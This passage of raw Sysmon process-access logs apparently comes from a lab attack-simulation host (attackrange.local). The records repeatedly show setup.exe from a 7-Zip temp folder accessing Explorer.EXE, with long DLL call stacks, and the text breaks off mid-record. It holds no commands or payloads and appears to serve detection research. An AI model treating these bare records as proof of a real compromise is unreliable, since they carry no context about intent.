|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.